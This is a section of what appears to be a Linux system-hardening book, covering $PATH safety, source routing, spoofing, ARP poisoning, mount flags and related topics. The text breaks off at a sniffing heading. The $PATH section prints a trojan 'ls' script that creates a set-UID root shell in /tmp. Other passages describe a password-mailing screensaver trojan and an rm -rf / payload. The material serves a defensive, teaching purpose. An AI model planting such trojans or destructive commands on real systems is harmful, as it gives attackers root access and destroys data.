3.4 Selected Short Subjects

These items are unrelated to one another, but none is long enough to justify a section of its own. All are important, however.

3.4.1 Cable Modems

DANGER LEVEL

Cable modems are now quite common for providing Internet access to home systems. They have high bandwidth and are reasonably reliable, though less so than standard modem or DSL service. Home users are not used to worrying much about security because a modem on a standard (analog) phone line is a private connection into the ISP's equipment that carries only that user's data. In other words, communication via modem is private in the sense that no one can sniff your data without direct access to your home network or to the network of whatever remote system you are interacting with.

The rules are different with cable modems, however. All the cable modems in a neighborhood of up to 100 or so systems are on a single local area network (LAN). Windows users who enable "Network Neighborhood" discover this when 10 or 100 systems they have never heard of pop up in their desktop window. Regardless of whether you are running Linux, Windows, or something else, this opens up serious security holes. These other systems can sniff the network for any unencrypted data that you transmit, such as passwords supplied for telnet, FTP, POP, or IMAP. Note that some modern cable systems do not have this problem because they use true routers to isolate each customer. Some DSL connections and some wireless arrangements have the same problem.

The solution is to use only encrypted protocols such as SSL and SSH. Keep in mind, too, that sharing a LAN with strangers opens up your systems to various protocol-level exploits that require access to your LAN. These exploits include spoofed UDP and TCP addresses (the cracker can see your responses by putting his interface in promiscuous mode, even though they are not sent to his "real" address). Other exploits are available by poisoning your ARP cache and by changing your system's MAC address or his own. See "Preventing ARP Cache Poisoning" on page 146 for discussion on poisoning ARP caches.

The solution is to act as if you have untrusted people on the LAN, because you do. Certainly, if you have any non-Linux systems, you will want to configure your Linux box as a firewall. You should send all confidential data via a good encryption method such as SSH or SSL. Most DSL connections do not suffer from this LAN problem.

3.4.2 $PATH: Values of . Give Rise to Doom

DANGER LEVEL

As many people know, the $PATH environment variable contains a list of directories to search to find the program that the user has requested be executed. It is used if there is no slash in the program name. Typically it contains directories such as /bin, /usr/bin, /usr/local/bin, perhaps $HOME/bin, etc.

The title of this section is inspired by the error message given by the UNIX Version 6 rmdir command if one tried to rmdir ".", except that "doom" was mistyped as "dom" until I pointed this out.

For ordinary users and for root, commonly it also contains "." specifying one's current directory. This is convenient when one develops or uses locally developed scripts or programs. It saves the bother of typing ./widget.

For root, it is one of the worst security holes possible on Linux! A SysAdmin operating as root frequently can be found in almost any directory in the system, including /tmp, home directories of users who might have been compromised or even may be malicious, and directories where insecure applications may be found.

Worse still, frequently "." is listed first in the search path. Thus, all a cracker needs to do is place scripts or programs in such directories with the same names as programs commonly invoked by root, such as ls, who, ps, favorite_editor, etc. For ls, all that would be required is something like

#!/bin/csh
if ( ! -o /bin/su ) goto finish
cp /bin/sh /tmp/.sh
chmod 4755 /tmp/.sh
finish:
exec /bin/ls $argv | grep -v ls

It is interesting to note that csh refuses to operate if its executable is set-UID to root; clearly the reason for this is to block this exploit. Perhaps this feature should be added to the other shells, although that would not slow an attacker down by much, because a trojan could just as easily use chmod on an existing program, or cp, dd, or a host of other programs, to achieve the same effect. The rule should be that root absolutely must not have "." in the search path and that, if other users do, "." appears only at the very end of the search path. Thus, even ordinary users will not be compromised by this very common technique. Keeping "." out of the path would even slightly speed up the system.
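A quick way to check for the problem, and a conservative explicit setting for root (the exact directory list is an assumption to adapt to your distribution), might be:

# Warn if "." or an empty component (which means the same thing) is in PATH:
if echo ":$PATH:" | grep -qE '(:\.:|::)'; then
      echo "WARNING: . is in the search path"
fi
# A safe explicit setting for root, e.g. in /root/.bash_profile:
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
export PATH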

Note that some intruders have been known to create such traps using mistyped names of common programs, hoping that someone will eventually mistype one. Such a trap would catch even someone having "." at the end of the search path, which is why root should not have "." anywhere in the search path. The consequences of root having "." in $PATH are too great to allow the risk. Also, it is an excellent idea to do a periodic /bin/ls of directories such as /tmp, /usr/tmp, /var/tmp, FTP's directories, those where CGIs play, and users' home directories to ensure that these traps have not been planted. An alternative to typing the full path name (/bin/ls) would be to run it from a trusted directory, such as /root, like this:

cd /root      
ls /tmp      
ls /usr/tmp      

etc.

The periodic use of find, invoked from root's crontab, would be an excellent idea.
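A minimal sketch of such a check follows; the directory list, the two-day window, and the script name are assumptions to adjust for your site.

#!/bin/sh
# /usr/local/sbin/check-public-dirs, run nightly from root's crontab, e.g.:
#   15 3 * * * /usr/local/sbin/check-public-dirs
/usr/bin/find /tmp /usr/tmp /var/tmp /home/ftp -type f -mtime -2 -ls 2>/dev/null \
    | /bin/mail -s "recently added files in public directories" root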

3.4.3 Blocking IP Source Routing

DANGER LEVEL

Normally, a system that routes packets on to other systems, such as a firewall, decides where to send a packet by looking up the packet's destination address in the system's routing table. A packet can override this by requesting source routing, which means that the packet itself tells the routing system where to send it. This is another concept that dates back to a kinder, gentler Internet. Although very rarely useful to white hats these days, a black hat can use source routing to get packets into networks that weak firewalls are trying to protect.

This is a serious enough problem that TCP Wrappers automatically disables source routing on services that it protects; this does not protect your other services. Systems occasionally get broken into in this manner. The solution is to have the kernel disable all source routing; packets with this feature enabled simply will be dropped (thrown away). It is suggested that all routers and servers do this; the overhead of doing this is zero.

The following commands disable source routing; they should be placed in /etc/rc.d/rc3.d/S22nosrcrte on your firewall or router. (You will want to symlink it from /etc/rc.d/init.d/nosrcrte.) The vast majority of systems do not need source routing, so this is quite safe to do. The script also disables ICMP redirect requests, which are instructions to have your system use a different "shorter" route for packets; that route could include the cracker's box or a third party for a DoS attack.

The script is available on the CD-ROM. TCP Wrappers will disable source routing for the services that it handles, but this does not protect services supplied by other daemons. The script described here (on systems with 2.2 and later kernels) will protect all services.
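Because the script itself is not reproduced in this excerpt, here is a minimal sketch of what such an S22nosrcrte script might look like, modeled on the Source Address Verification script shown in the next section; the /proc paths assume a 2.2 or later kernel:

#!/bin/sh
# Sketch: disable IP source routing and ICMP redirects on all interfaces
if [ -e /proc/sys/net/ipv4/conf/all/accept_source_route ]; then
      echo -n "Disabling IP source routing and ICMP redirects..."
      for f in /proc/sys/net/ipv4/conf/*/accept_source_route; do
            echo 0 > $f
      done
      for f in /proc/sys/net/ipv4/conf/*/accept_redirects; do
            echo 0 > $f
      done
      echo "done."
else
      echo "ERROR: CANNOT DISABLE SOURCE ROUTING!  HELP!"
      sleep 30
fi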

Various types of packet spoofing are discussed in "Packet Spoofing Explained" on page 239.

3.4.4 Blocking IP Spoofing

DANGER LEVEL

A useful kernel feature to protect against IP spoofing is called Source Address Verification. It appeared with the 2.2 kernels. When it is enabled, the kernel checks each incoming packet by verifying that it arrived on an interface appropriate for that packet's source address. It bases this on its routing table, which must be set up correctly for this protection to work. Inappropriate packets are dropped.

For example, on a home or small business network, the internal interface is eth1 and carries the 10.*.*.* network, the reserved class A network. The external interface, eth0, is attached to the Internet and has a real Internet IP address. If a packet with a source address of 10.0.0.17 comes in from eth0 (the Internet), it is inappropriate and will be dropped. Crackers know that an organization's systems will give a higher level of trust to internal systems than they will to external systems, and so will try to break in with faked source addresses.

You might be granting this trust by specifying allowed IP addresses or host names with TCP Wrappers or similar. Although the same effect can be had with IP Chains, Source Address Verification easily adds to the "Rings of Security" in case of error. The following commands enable this protection; they could be placed in /etc/rc.d/rc3.d/S22nospoof on your firewall or router. (You will want to symlink it from /etc/rc.d/init.d/nospoof.) The script is available on the CD-ROM.

#!/bin/sh
# Turn on Source Address Verification on all interfaces
if [ -e /proc/sys/net/ipv4/conf/all/rp_filter ]; then
      echo -n "Enabling IP spoofing blocking..."
      for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
            echo 1 > $f
      done
      echo "done."
else
      echo "ERROR: CANNOT SET UP IP SPOOF BLOCKING!  HELP!"
      sleep 30
fi

Various types of packet spoofing are discussed in "Packet Spoofing Explained" on page 239.

3.4.5 Automatic Screen Locking

DANGER LEVEL

Certainly, most sites should require users either to lock their screens or to log out when away from their systems. For a user operating under X, xlock may be invoked to lock the screen immediately until the user supplies the account password.

For automatic locking after the keyboard and mouse are inactive for a set number of minutes, xscreensaver may be run in the background with the -lock-mode flag. For those using Gnome, this may (and should) be made to happen automatically. To do this, the navigation sequence is

footprint->Settings->Desktop->Screensaver

Then click to indicate Require password and set the number of minutes to an appropriate value between 5 and 30. Finally, click OK.
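Outside of Gnome, a sketch of the equivalent setup (the file name is only an example; check your xscreensaver man page for the exact flags your version supports) might be:

# In ~/.xsession or ~/.xinitrc: lock automatically after the idle timeout
xscreensaver -lock-mode &
# To lock immediately, e.g. from a panel button or before walking away:
xscreensaver-command -lock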

The author is the inventor of the lock program shipped with Berkeley UNIX.

Do be aware that there is a potential here for a screensaver simulator, similar to the login simulators discussed in "Defeating Login Simulators" on page 325, and it is easy to install. All someone needs to do is to get the source to xlock or xscreensaver, modify it to also mail the entered password to a rogue account, and install it on the system.

The installation can be as easy as setting up an e-mail auto-responder (transponder) that will e-mail the uuencoded binary to whatever account sends e-mail to the special account. The interloper sends this e-mail from the victim's terminal, runs uudecode on the reply e-mail, and installs the resulting binary in the victim's bin directory. This might be done in two minutes. An alternative is to have a second person standing by to receive this e-mail and do a "reply" with the Trojan.

Of course, if the system has a floppy or CD-ROM drive, that could be used instead, but it would be more incriminating: in many jurisdictions, carrying the media probably would be justification for Security to hold the person for the police, and it would provide the evidence needed to send her to jail.

The Trojan will remove itself when it has done its job. This is a very good reason for physical security to be tighter than it is in most organizations, where someone unfamiliar to employees can loiter about and sit in a cube where the walls hide the person's actions.

3.4.6 /etc/mailcap

DANGER LEVEL

One of the fun and somewhat recent developments in computing has been multimedia, including multimedia e-mail. In Linux, most of the mailers use the /etc/mailcap file (the metamail capabilities file) for instructions on what program to invoke to process each type of data in the message. Some of these types are believed to be benign, such as .gif and .jpeg images and .mpeg movies. Others, such as Bourne and C shell scripts, PostScript, troff, Perl, Tcl, and tar archives, are too dangerous to be allowed.

These latter formats allow the creator to issue certain commands that could be harmful to the system. Although it is obvious that a Bourne or C shell script could contain an rm -rf / command, not too many people know that both PostScript and troff allow shell escapes that could contain the same harmful Trojan.

It is hard to determine which types of mail attachments are truly safe. These dangerous "shell escapes" are a dirty little secret that many want to ignore.
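For reference, /etc/mailcap maps a MIME type to the program that handles it, one entry per line. A sketch of the format follows; the viewer paths here are only examples, so use whatever viewers your distribution provides.

image/gif; /usr/bin/xv %s
image/jpeg; /usr/bin/xv %s
# Never allow entries like the following, which hand the attachment
# to an interpreter:
# application/x-sh; /bin/sh %s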

There is an additional security problem: a user may specify her own $HOME/.mailcap file. The default search path will look for this file before looking for the system mailcap files. This allows any user to override your carefully constructed /etc/mailcap file. You could install the .mailcap file that you want in each user's home directory and set the immutable bit to prevent users from altering your version via

chattr +i /home/*/.mailcap

However, a user could change her $MAILCAPS environment variable to specify a different place to obtain this information. This cat and mouse game could go on with your setting the immutable bit on users' shell startup files or modifying metamail to use only the system mailcap file and users importing their own metamail programs. Netscape has its own configuration file with a set of commands that serve an equivalent function to /etc/mailcap and thus can have the same problem. This is discussed in "Important Netscape Preferences" on page 262.

The ancient Mail program (mailx on some distributions) does not support multimedia directly. However, Mail allows the use of a "PAGER" program, typically more or less. This feature was intended to allow a user to specify the name of a program to page through long messages one screen at a time. If the PAGER is set to metamail, Mail is at the mercy of the system's /etc/mailcap configuration. This Mail feature can be used to get a multimedia capability quite easily with the following entries in your .mailrc file:

set PAGER=/usr/local/bin/metamail
set crt=1

3.4.7 The chattr Program and the Immutable Bit

DANGER LEVEL

The standard file system for Linux systems is the ext2 file system, though Linux supports many other file systems, including several Microsoft formats. It is not common knowledge that the ext2 file system is a superset of the Berkeley UNIX Fast File System. Among the features added to the ext2 file system are several additional bits that alter the handling of files with those bits. One of the most powerful and useful is the immutable bit. When the immutable bit has been applied to a file, that file may not be altered in any way (except that reading that file's data will update the access time in its inode block). This includes altering the file's data through write() or altering the file's inode information through chown(), chmod(), etc.

The immutable bit overrides the normal Linux permissions and not even root can alter a file with the immutable bit set, except by removing the immutable bit first. Only root is allowed to set or remove the immutable bit; the command to add the immutable bit to the file foo is

chattr +i foo

and the command to remove it is

chattr -i foo

The immutable bit may be overridden only by access to the raw disk device in /dev. The chattr program supports the -R flag that will cause it to operate on an entire directory tree.
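For example, to protect an entire tree and then verify the attribute (the path here is only an example), one might use:

chattr -R +i /usr/local/bin      # protect the directory and everything under it
lsattr -d /usr/local/bin         # verify: an "i" should appear in the flags
lsattr /usr/local/bin            # likewise for the files inside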

3.4.8 Secure Deletion

DANGER LEVEL

The ext2 file system claims to support secure deletion but does not. Recall that normally when a file is removed, Linux and UNIX will mark the data blocks as available for reallocation to another file but will not overwrite the existing data in any of these data blocks until that block subsequently is selected for allocation and written to by the new program.

This failure of Linux to overwrite possibly confidential data when a file is removed or truncated is not considered a security problem because root is the only user that can see those blocks on a correctly configured system.

For high-security applications where you want to harden a system to minimize damage if the system is cracked, this is not acceptable. One solution is for an application to have knowledge of the kernel's file I/O algorithms and, thus, for the application to overwrite its confidential data before removing or truncating a file that it is manipulating. This technique is discussed in "Truly Erasing Files" on page 162.

Secure deletion is documented as not supported as of the 2.4 kernel in ext2 and ext3. I confirmed this experimentally with 2.4.18 on RH7.3. A quick test was conducted in which a file with a known unique pattern was created via cat > foo, its secure deletion bit was set, and the file was removed. A subsequent grep of the raw disk partition did indeed find the deleted block with this pattern in it, confirming that the data was not overwritten.
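A sketch of that test follows; the mount point, partition name, and pattern are only examples, and the test should never be run on a disk holding anything of value:

cd /mnt/test                  # an otherwise idle ext2 file system on /dev/hda5
cat > foo                     # type a unique pattern such as zqxjkw-test, then ^D
chattr +s foo                 # set the ext2 secure-deletion attribute
rm foo
sync
grep -a zqxjkw-test /dev/hda5 # a match means the data was not overwritten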

Normally, I/O operations to the disk are done asynchronously with respect to the system calls that request these operations. This offers a tremendous performance improvement which helps explain why Linux outperforms some other operating systems on the same hardware by a factor of two. The disadvantage is that in the unlikely event of a crash, the file system is not left in a completely known state.

For example, it will not be known if a file that was removed while the secure deletion flag was on actually was securely removed. Even if an application is keeping track of the status of removed files, these applications will not know if the secure deletion was completed. A solution to this dilemma is the additional use of the synchronous bit, discussed in "Synchronous I/O" on page 139, though there is a severe performance penalty for this.

Note that this ext2 secure deletion feature is activated when a file is removed but not when it is shortened through truncation. This shortening might be done via

cp /dev/null foo

or with the creat() or ftruncate() system calls. To successfully overwrite confidential data when doing these operations, use the methods in "Truly Erasing Files" on page 162.

3.4.9 Synchronous I/O

DANGER LEVEL

Normally, Linux does actual I/O operations to the disk asynchronously to system call requests that initiate this I/O. This means that when a program's invocation of the write() request returns a successful status, the program issuing this system call cannot know absolutely if the write was successful because it probably has not happened yet.

Even though Linux normally does I/O asynchronously, a system call always will indicate if there is not enough space in the file system to complete the write operation. (This is indicated by write() returning a byte count smaller than the count that was requested, or by any other affected system call failing with ENOSPC.) This notification is possible because the I/O buffering is done at the block device level, which is below (later than) the file system level that worries about free space on a file system.

In certain circumstances when you want a program to know absolutely if the I/O has completed, the ext2 file system's synchronous bit may be used to alter the rules. When this bit is set on a file, all I/O to that file will be done synchronously. This means that the write() system call will not return until the actual write request to the disk device has completed successfully and the disk device has indicated that the data has been written successfully.

As an alternative to setting synchronous mode on a per-file basis, you can set synchronous I/O on a per-file system basis with the sync mount option.

Even if the disk device has indicated that data was written to the disk successfully, many modern disk devices have their own buffer, sometimes known as a disk cache or on-disk cache. One solution to this problem of not knowing when the data in the disk cache has actually been written to the media is to disable the disk device's write cache. This capability is mentioned briefly in the documentation for the hdparm program, which states that the -W flag controls this.

The hdparm documentation also seems to state that this write cache normally is off, but the documentation is not clear. Based on observed performance of various disk models, I am not convinced that this feature is off by default. Besides inspecting the disk driver's source code for clues, one test would be to configure synchronous mode for a file, write data to it, and then immediately turn off power to the system. After boot-up, see whether the data was written to the disk successfully. (Obviously, there is risk of file system corruption, so this test should not be done on a system with anything of value on any mounted file system.)
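A short sketch of the three mechanisms just discussed (the file names and device names are only examples; check your chattr, mount, and hdparm man pages before relying on them):

chattr +S /var/log/critical.log      # per-file synchronous I/O (the ext2 'S' attribute)
mount -o remount,sync /secure        # per-file system synchronous I/O on a mounted file system
hdparm -W 0 /dev/hda                 # ask an IDE disk to disable its write cache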

3.4.10 Mount Flags for Increased Security

DANGER LEVEL

Linux offers a number of per-file system flags that may be specified either directly to the mount command when a file system is mounted or in the /etc/fstab file, so that they take effect automatically unless overridden on the command line to mount. These may be used for an additional "Ring of Security." On the command line, these may be listed as a comma-separated list to the -o flag; an example /etc/fstab entry appears after the list.

  • nodev

    This flag prevents the kernel from recognizing any device files on the file system. If there is no reason for there to be any device files on the file system, this prevents breaching security simply by creating a hda1 or sda1 device that is writable by all. This especially is useful for CD-ROM- and NFS-based file systems.

  • noexec

    This flag prevents any executable on the file system from being executed. This is useful for file systems where there should not be executables, such as those serving as Apache (httpd) document repositories that contain no CGI scripts.

    Understand that this inhibits only executables started directly by the kernel. It will not protect against someone doing, say,

    sh /httpd/htdocs/foo.sh
    
  • nosuid

    This flag prevents the set-UID or set-GID bit on any executable file from being honored. Again, this prevents the use of certain "hacks" to breach security in the event of a crack in the "Rings of Security."

  • ro

    The ro flag causes the file system to be mounted Read/Only, inhibiting any alteration of information on the file system, including any file's access time value. This is a fine option to use on file systems holding httpd htdocs directory trees containing unchanging data.
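A sketch of an /etc/fstab entry combining these flags (the device and mount point are only examples):

/dev/hda7   /home/httpd/htdocs   ext2   ro,nodev,noexec,nosuid   1 2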

3.4.11 Wrapping UDP in TCP and SSH

DANGER LEVEL

In "Why UDP Packet Spoofing Is Successful" on page 242, the ease in which UDP packets can be spoofed was examined and why generally it is not secure unless it is used on a network protected from untrusted systems. Although SSH offers a secure tunnel for TCP connections, it does not offer this service for UDP packets. This is by choice rather than any absolute technical limitation.

Although a process can use an open UDP port to send packets to any UDP port of any IP address in a random manner, most usage involves a sequence of packets exchanged between pairs of systems. A UDP-based server, such as NFS, can be thought of as having simultaneous conversations with a number of clients. The solution is to write a small client/server UDP-TCP translator system that converts between UDP and TCP. This actually could be quite easy.

The UDP client would send its UDP packets to a dedicated UDP port on its own system instead of the server's system. IP Chains on that system would block packets from other systems attempting to send to either of these two ports (the original UDP client's or the client side of the UDP-TCP translator's) to prevent spoofing. The translator would open a second port as a TCP port to one end of an SSH tunnel on the same system. Each UDP packet's data would be sent to the TCP port with a 16-bit (2-byte) header specifying the length, because each UDP packet has a definite size while TCP is an undelimited sequence of bytes.

SSH would encrypt data from the TCP port and transfer it to the server machine and send it to the specified port where the server side of the UDP-TCP translator would convert it to a UDP packet. This is done by reading the 2-byte header and then reading that many bytes, assembling the data into a buffer. This buffer would then be sent as a UDP packet to the ultimate server. Data from the UDP server would make a corresponding journey back to the UDP client.
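In practice, a rough version of this scheme can be assembled without writing new code by combining an SSH port forward with a general-purpose relay such as socat. The sketch below is an alternative to, not an implementation of, the length-prefixed translator described above; the host names and port numbers are assumptions, and because this simple relay does not add a length header, it relies on each datagram arriving as a single TCP read.

# On the client system: carry TCP port 7777 to the server over SSH.
ssh -f -N -L 7777:localhost:7777 server.example.com

# On the client system: accept the application's UDP packets on port 5353
# and feed them into the tunnel.
socat udp4-listen:5353,reuseaddr,fork tcp:localhost:7777 &

# On the server system: pull the data out of the tunnel and deliver it to
# the real UDP service on port 5353.
socat tcp4-listen:7777,reuseaddr,fork udp:localhost:5353 &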

3.4.12 Cat Scratches Man

DANGER LEVEL

The man program is used to display sections from the online Linux manual. This is a very useful feature. It has some minor problems, in that formatting the nroff files is slow and the documentation takes up a lot of disk space. Well, these used to be problems when processors were slower and disks were smaller. In any case, the man program was enhanced so that when a page was formatted, the formatted page would be stored. The next time any user wanted to see that page, the man program quickly copied that stored formatted version. On many versions of Linux, the formatted version is stored in a compressed form to reduce disk space.

No doubt you can see the problems. On most Linux systems, the directories where these semi-temporary files containing the formatted pages are stored are mode 777, and the files are created mode 644 and owned by the user who first invoked man for the respective page. The security problems that this creates are as follows:

  1. A directory with mode 777 is created, allowing users to store random files temporarily without administrative control, notice, or restrictions. Certainly, on a significant percentage of systems these directories are used to store cracker warez (cracker tools), pornography, and files that the users do not want seen in their own directory trees.

  2. An evil user can plant false documentation, inducing a user or programmer to create a security hole based on this false documentation.

  3. An evil user can create empty files there, preventing legitimate users from obtaining the documentation they want.

  4. Over time, these directories can accumulate a large amount of data, reducing the disk space available for other uses.

There are several solutions.

  1. Disable this "cat" feature by removing the cat directories. For each section of the manual, manX, the man program will try to put the formatted version in the directory catX only if catX exists. It will look for an existing formatted copy of the desired manual page only in catX if it exists. The man program will not try to create these directories.

    Thus, the solution is to remove them. Carefully cd to /usr/tmp and type the command

    /bin/rm -rf /usr/man/cat*

    (The cd to /usr/tmp is to minimize the damage should you accidentally put a space before the *.) If you do get extra spaces in this command, plan on doing a full system restore.

  2. A user called man could be created, and the man program and the /usr/man/cat* directories could be changed to be owned by man. The man program then could be made set-UID to man. This safely will allow this feature. Besides enabling this capability, the commands below clean out any existing formatted pages that might be bogus. The cat*/ sequence is used because on many systems these cat "directories" actually are symbolic links, typically to a directory tree on the /var file system. This technique causes the actual directories and their files to be affected rather than the symbolic links themselves. The commands to set this up follow:

    # First create a man user with a unique UID; then:
    /bin/rm -f /usr/man/cat*/*
    ls -la /usr/man/cat*/.
    chown man /usr/bin/man /usr/man/cat*/.
    chmod 4755 /usr/bin/man; chmod 2755 /usr/man/cat*/.
  3. Formatted manual pages that have not been accessed recently can be removed nightly by placing the following command in root's crontab. Note that this feature will not work if the backup mechanism causes files' access times to be altered when the backup is done or if users regularly read all files on the system, thereby updating the access times. If either of these is a problem, the -atime may be changed to -mtime.

    find /usr/man/cat*/. -type f -atime +30 \
       -print | xargs -n 50 /bin/rm -f

3.4.13 Limiting Your Success with *limit

DANGER LEVEL

Under Linux, there are many attributes that a process inherits from its parent during a fork and which are retained across an exec. Most SysAdmins are familiar with some of these attributes, such as the process's UID, GID, current working directory (cwd), and root directory (which is affected by chroot), as well as open file descriptors. Additionally, there are limits on the resources that a process may use. These limits are intended to prevent a runaway process (that is, a program bug or user error) from running the system out of critical resources. Under bash (sh), the current limits of these resources may be listed with the ulimit -a command. A typical response would be

core file size (blocks)  2097151
data seg size (kbytes)   unlimited
file size (blocks)       1048576      
max memory size (kbytes) unlimited
stack size (kbytes)      8192
cpu time (seconds)       unlimited      
max user processes       256
pipe size (512 bytes)    8
open files               256
virtual memory (kbytes)  2105343

The values of these limits are not magically changed when a user invokes a set-UID program. Thus, an evil user, or even just a curious one, could cause a set-UID program to fail in unanticipated ways by setting some of these limits to low values prior to invoking the set-UID program. Unless the set-UID program is very carefully written, this fiddling with resource limits might open security holes. The solution is for the programmer creating a set-UID or set-GID program to check the values of important limits, try to boost any that are too low, and exit with an error if any necessary limit cannot be raised to an acceptable level. The setrlimit() system call is used to set these limits; the getrlimit() system call is used to read them. The getrusage() system call reports the current usage of various resources.

The SysAdmin can set the limits for ordinary users by placing the appropriate commands in users' .profile, .login, .bash_profile, or .tcshrc files, setting these files' immutable bit (chattr +i), and inhibiting users from changing their shells (or giving each user an appropriate startup file for each shell allowed in /etc/shells). PAM's pam_limits.so can also be used.
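A sketch of what such settings might look like (the numbers are only examples to tune for your site):

# In users' .profile or .bash_profile:
ulimit -c 0            # no core dumps
ulimit -u 128          # at most 128 processes per user

# Or, with PAM's pam_limits.so, in /etc/security/limits.conf:
# @users    hard    core     0
# @users    hard    nproc    128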

3.4.14 Shell History on Public Display

DANGER LEVEL

Both csh and bash have a wonderful feature in that they will store a history in memory of recently executed commands that the user has issued. This feature allows a user to build up a new command to issue from pieces of previous commands, such as long file names, or simply may be used to repeat commands, for example, during debugging. Additionally, it allows a user to refresh his memory regarding recently issued commands or those of the previous afternoon. When the user exits, this history can be stored in a file in the user's home directory. When the user logs in again first thing in the morning, he can see what he had been working on the previous day or perhaps the previous Friday. This is a helpful memory aid.

The problem with this is that it also clues in a cracker to what you have been up to and what is important on your system. The names of other systems that you and your users have connected to are shown so that the cracker can start cracking them too. If your users use a mailer where the recipient's address can appear on the command line, that information too is available. This will suggest other systems for the cracker to work on or possibly people to perpetrate an e-mail scam against. Some poorly designed commands still take a password on the command line and these will be stored in the history file; commands where your users supply a password from a file will be visible so a cracker will know what file holds the password.

The solution is to limit the amount of history saved on disk, perhaps to 10 commands. If using csh, the following line may be placed in a user's $HOME/.cshrc file or the system-wide /etc/csh.cshrc.

set savehist=10

Users of bash will benefit from the following entry in $HOME/.bash_profile, or /etc/profile.

HISTFILESIZE=10

Occasionally, people issue some commands just before exit or logout that should not be remembered in the history. The solution is to issue the appropriate set command interactively to set the saved history size to zero prior to exiting.
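For example, a user of csh could type

set savehist=0

and a user of bash could type

HISTFILESIZE=0
unset HISTFILE

before exiting; unsetting HISTFILE tells bash not to write a history file at all.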

After a security breach, be sure to check users' history files for evidence that the intruder left behind. Although a skillful cracker will leave no evidence, a less skilled one will.

3.4.15 Understanding Address Resolution Protocol (ARP)

Even though we typically envision TCP packet transfers occurring at the IP address level, when traveling on an Ethernet, each packet is addressed by MAC (Media Access Control) addresses only. These MAC addresses are six hexadecimal pairs, such as 00:20:AF:27:C7:EA, that are almost never seen by users or SysAdmins in normal operation. They also are known as Ethernet addresses. When one device wants to communicate with another over the local Ethernet, the IP address is not sufficient to send the packet; the MAC address must be used, and before it is used it must be discovered. This is what the Address Resolution Protocol (ARP) does.

The local TCP stack sends a broadcast ARP packet asking, for example, "Who has IP address 192.168.5.2?"; the device with that address responds with its 6-byte hardware MAC address. Now, the normal packet is delivered to its destination without further delay. This process is called "Discovery." It would be inefficient and unnecessary to do this IP to MAC discovery for each normal packet to be sent, because this would almost triple the traffic. Instead, each system maintains an "ARP cache" of recent IP to MAC mappings and the system looks in this table before bothering with an ARP request. Entries in this table have a very short lifetime, except for permanent entries, defaulting to a minute on Linux. To see your system's value, in seconds, issue the command

cat /proc/sys/net/ipv4/neigh/eth0/gc_stale_time

The command

echo 120 > /proc/sys/net/ipv4/neigh/eth0/gc_stale_time

will change the cache time to 120 seconds, but it is a good idea not to alter these values without a thorough understanding of the consequences, and certainly not on a production network without careful testing. After this timeout has occurred, if there is space in the ARP cache, the entry will still be used: before doing a broadcast, the system will first ask the particular target system directly what MAC address should be used for sending to it. This avoids a broadcast and avoids wasting cycles on the possibly hundreds of systems on that segment. This is important to remember if you suspect that your ARP caches were poisoned. The ARP cache can be viewed via

arp -a

or

cat /proc/net/arp

An individual entry, say, pentacorp.com, can be deleted from a system's ARP cache via

arp -i eth0 -d pentacorp.com

Be aware that many Cisco routers and other devices violate the ARP protocol and either cache the data for up to 30 minutes (not seconds) or refuse even to do discovery at all. Instead, they may only cache ARP data when a system sends out a packet.

Proxy ARP is an extension of ARP in which a device responds to ARP requests on behalf of another device. It is a type of routing commonly used, in place of standard routing, on small networks where the cost or complexity of dedicated routing hardware is not desired. The device simply listens for ARP requests for any IP address in the remote side's address space and responds with its own MAC address. Once a packet arrives, it forwards the packet to the other end, possibly over a non-Ethernet medium such as a T1 circuit or PPP connection.

ARP problems may be detected by Arpwatch, discussed in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Also see MAC in the Index.

3.4.16 Preventing ARP Cache Poisoning

DANGER LEVEL

ARP stands for Address Resolution Protocol. It is the protocol that maps a numeric IP address to the MAC address of an Ethernet card (network interface card, or NIC). The MAC address is what actually is used for addressing most packets on an Ethernet.

If a cracker can compromise a system on an Ethernet segment, he easily can change the ARP cache of any system on that segment. If your gateway systems support Proxy ARP, he can substitute any system on the Internet for any of your systems, with terrible consequences. Note that even this Proxy ARP attack must be launched from a system on the LAN, but if he has access to one, he can use it to have packets routed to and from any system on the Internet.

"Hardwiring" the ARP addresses is effective at stopping ARP cache poisoning. These are known as permanent ARP addresses. Because the ARP cache data for a system usually changes only when its IP address changes or its Ethernet card is changed due to a hardware failure, this data typically changes very infrequently. (See "Checking the Cache" on page 553 for details on how to have a replacement Ethernet card use the same MAC address as the old one.)

On each Linux or UNIX system, edit /etc/ethers and add a line for each system that a given system needs to communicate with reliably. On each line, the host name or IP address should appear, followed by white space and the MAC address. The MAC address should be six pairs of hexadecimal numbers, with the pairs separated with colons. A "#" character starts a comment. The following line should be added to the /etc/rc.d/rc.local file so that /etc/ethers is processed at boot-up time. It must be executed after Ethernet interfaces and static routing tables are set up as these are needed first.

arp -f /etc/ethers
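A sketch of what /etc/ethers entries might look like (the host names and addresses are only examples):

# /etc/ethers: permanent IP-to-MAC mappings, loaded at boot with arp -f
gateway.pentacorp.com   00:10:4B:CA:FE:01
10.1.1.5                00:20:AF:27:C7:EA   # build server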

Alternatively, issue the commands directly to add these permanent entries (until the next reboot), as in this example:

arp -i eth0 -s 64.124.157.102 03:F3:B7:D5:63:32

To list the contents of your ARP cache, issue the command:

arp -anv

ARP problems may be detected by Arpwatch, discussed in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Also see MAC in the Index.

3.4.17 Hacking Switches

DANGER LEVEL

Most system administrators give little thought to switches, considering them barely above electrical junction boxes. Recall that switches and hubs route traffic between different systems, commonly 10Base-T and 100Base-TX Ethernet and similar hardware. This routing is done based on the MAC address; see "Preventing ARP Cache Poisoning" on page 146 for details on how ARP is used to map a system's IP address to its MAC address. A true hub has no intelligence. It takes a packet originating from any system and forwards it to all other systems, letting the intended recipient pick out the traffic that is meant for it. While this will limit the bandwidth for demanding applications, there is a more severe problem.

The biggest security problem with a hub is the same problem experienced with the original coax "thicknet" and "thinnet" Ethernet: All traffic between any pair of systems can be seen by all other systems on the network. This allows any rogue or compromised system on the network to sniff all other traffic, destroying any security for unencrypted traffic. The solution, of course, is the present day staple: 10Base-T- and 100Base-TX-based systems connected to switches. Each system has a separate wire leading to the switch. Of course, this destroys one of the two important features of the original Ethernet, namely the use of a single data cable rather than the rat's nest of wires that the graybeards remember as serial TTY communications.

Tip for Sniffing

